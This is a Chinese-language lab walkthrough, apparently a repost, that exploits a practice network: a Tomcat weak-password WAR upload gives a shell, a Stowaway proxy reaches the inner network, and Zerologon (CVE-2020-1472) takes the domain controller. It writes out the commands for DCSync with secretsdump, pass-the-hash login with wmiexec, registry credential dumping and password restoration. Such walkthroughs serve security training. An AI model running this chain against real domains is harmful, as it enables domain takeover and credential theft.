打靶训练——Netlogon域提权(CVE-2020-1472)

admin
admin
admin
138635
文章
114
评论
2024年5月7日10:35:41评论29 views字数 1920阅读6分24秒阅读模式

环境搭建:

攻击机kali(192.168.1.109)

win server2008(192.168.1.104)双网卡(域内机器)

域控server2016:xxxx

漏洞描述:

CVE-2020-1472是一个windows域控中严重的远程权限提升漏洞,影响Windows Server 2008R 2至Windows Server 2019的多个版本系统,只要攻击者能访问到目标域控井且知道域控计算机名即可利用该漏洞.该漏洞不要求当前计算机在域内,也不要求当前计算机操作系统为windows,该漏洞的稳定利用方式为重置目标域控的密码, 然后利用城控凭证进行Dc sync获取域管权限后修复域控密码,之所以不直接使用坏控凭证远程执行命令,是因为城控账户是不可以登录的,但是域控具备Dc sync权限, 可以获取域内任意用户的凭证。

漏洞利用过程中会重置域控存储在域中(ntds.dit)的凭证,而域控存储在域中的凭证与本地的注册表/lsass中的凭证不一致时,会导致目标域控脱域,所以在重置完域控凭证后要尽快恢复。

打靶正文:

1、端口扫描

目标有web资产:

打靶训练——Netlogon域提权(CVE-2020-1472)

2、tomcat弱口令上传war包getshell

打靶训练——Netlogon域提权(CVE-2020-1472)

3、收集主机信息

通过netstat、ipconfig、route可收集到主机可通往192.168.4.0网段;

通过systeminfo可查询主机是域内机器;

通过net time /doamin可查询域控主机;

打靶训练——Netlogon域提权(CVE-2020-1472)

打靶训练——Netlogon域提权(CVE-2020-1472)

定位域控:

nslookup -q=srv _ldap._tcp.dc._msdcs.xiaodi.vpcnet time /domain

打靶训练——Netlogon域提权(CVE-2020-1472)

打靶训练——Netlogon域提权(CVE-2020-1472)

域控:dc.xiaodi.vpc  ip: 192.168.4.20

4、做代理

使用stowaway做代理:

目标机器执行:

windows_x64_agent.exe -l 192.168.1.104:4455 -s joyboy

打靶训练——Netlogon域提权(CVE-2020-1472)

攻击机执行:

./linux_x64_admin -c 192.168.1.104:4455 -s joyboy

打靶训练——Netlogon域提权(CVE-2020-1472)

开启socks代理

打靶训练——Netlogon域提权(CVE-2020-1472)

配置socks代理:

打靶训练——Netlogon域提权(CVE-2020-1472)

5、打域控

扫描域控是否存在Zerologon(CVE-2020-1472)漏洞

工具准备:

 git clone https://github.com/SecuraBV/CVE-2020-1472 #下载POC,用于检测是否存在CVE-2021-1472 git clone https://github.com/dirkjanm/CVE-2020-1472 #下载EXP,用于置空域控密码 git clone https://github.com/risksense/zerologon #用于恢复原始hash,防止脱域等风险 git clone https://github.com/SecureAuthCorp/impacket #选择性下载网络协议包impacket,kali自带。若下载,需要pip install . 来安装

打靶训练——Netlogon域提权(CVE-2020-1472)

打靶训练——Netlogon域提权(CVE-2020-1472)

使用poc结果显示目标存在漏洞!!!

使用exp置空域控密码:

打靶训练——Netlogon域提权(CVE-2020-1472)

通过secresdump来获取域控hash

proxychains4 secretsdump.py 'xiaodi.vpc/dc$@xiaodi.vpc' -just-dc -no-pass

打靶训练——Netlogon域提权(CVE-2020-1472)

使用wmiexec登录域控:

proxychains4 wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:5e7f9efc2634f59c2fab89e99c89afd1 xiaodi.vpc/administrator@192.168.4.20

打靶训练——Netlogon域提权(CVE-2020-1472)

打靶训练——Netlogon域提权(CVE-2020-1472)

6、恢复域控密码

在域控主机上从注册表导出hash文件,并下载到本地

reg save HKLMSYSTEM system.hivereg save HKLMSAM sam.hivereg save HKLMSECURITY security.hivelget sam.hivelget security.hivelget system.hive

打靶训练——Netlogon域提权(CVE-2020-1472)

使用secretsdump读取下载到本地的hash文件,获取域控机器账户置空前的原始hash。

secretsdump.py -sam sam.hive -security security.hive -system system.hive LOCAL

记住这个32位hash打靶训练——Netlogon域提权(CVE-2020-1472)

使用hash恢复工具,并用命令恢复原来的密码:

proxychains4 python3 reinstall_original_pw.py dc 192.168.4.20 f44b3f823218f4eaa005a77b16186ae

打靶训练——Netlogon域提权(CVE-2020-1472)

无法使用空密码攻击,成功恢复密码:

打靶训练——Netlogon域提权(CVE-2020-1472)

原文始发于微信公众号(fly的渗透学习笔记):打靶训练——Netlogon域提权(CVE-2020-1472)

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年5月7日10:35:41
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   打靶训练——Netlogon域提权(CVE-2020-1472)https://cn-sec.com/archives/2713890.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息